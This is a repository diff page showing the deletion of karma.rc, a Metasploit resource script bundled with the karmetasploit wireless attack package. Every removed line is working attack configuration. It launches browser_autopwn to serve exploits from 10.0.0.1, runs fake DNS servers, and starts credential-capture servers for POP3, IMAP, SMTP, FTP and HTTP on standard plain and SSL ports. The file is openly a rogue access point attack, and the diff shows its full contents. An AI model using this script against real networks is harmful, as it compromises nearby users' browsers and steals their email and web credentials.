summaryrefslogtreecommitdiff
path: root/net-wireless/karmetasploit/files/karma.rc
diff options
context:
space:
mode:
Diffstat (limited to 'net-wireless/karmetasploit/files/karma.rc')
-rw-r--r--net-wireless/karmetasploit/files/karma.rc80
1 files changed, 0 insertions, 80 deletions
diff --git a/net-wireless/karmetasploit/files/karma.rc b/net-wireless/karmetasploit/files/karma.rc
deleted file mode 100644
index b98a27b6..00000000
--- a/net-wireless/karmetasploit/files/karma.rc
+++ /dev/null
@@ -1,80 +0,0 @@
-load db_sqlite3
-db_create /root/karma.db
-
-use auxiliary/server/browser_autopwn
-
-setg AUTOPWN_HOST 10.0.0.1
-setg AUTOPWN_PORT 55550
-setg AUTOPWN_URI /ads
-
-set LHOST 10.0.0.1
-set LPORT 45000
-set SRVPORT 55550
-set URIPATH /ads
-
-run
-
-
-
-use auxiliary/server/capture/pop3
-set SRVPORT 110
-set SSL false
-run
-
-use auxiliary/server/capture/pop3
-set SRVPORT 995
-set SSL true
-run
-
-use auxiliary/server/capture/ftp
-run
-
-use auxiliary/server/capture/imap
-set SSL false
-set SRVPORT 143
-run
-
-use auxiliary/server/capture/imap
-set SSL true
-set SRVPORT 993
-run
-
-use auxiliary/server/capture/smtp
-set SSL false
-set SRVPORT 25
-run
-
-use auxiliary/server/capture/smtp
-set SSL true
-set SRVPORT 465
-run
-
-use auxiliary/server/fakedns
-unset TARGETHOST
-set SRVPORT 5353
-run
-
-use auxiliary/server/fakedns
-unset TARGETHOST
-set SRVPORT 53
-run
-
-use auxiliary/server/capture/http
-set SRVPORT 80
-set SSL false
-run
-
-use auxiliary/server/capture/http
-set SRVPORT 8080
-set SSL false
-run
-
-use auxiliary/server/capture/http
-set SRVPORT 443
-set SSL true
-run
-
-use auxiliary/server/capture/http
-set SRVPORT 8443
-set SSL true
-run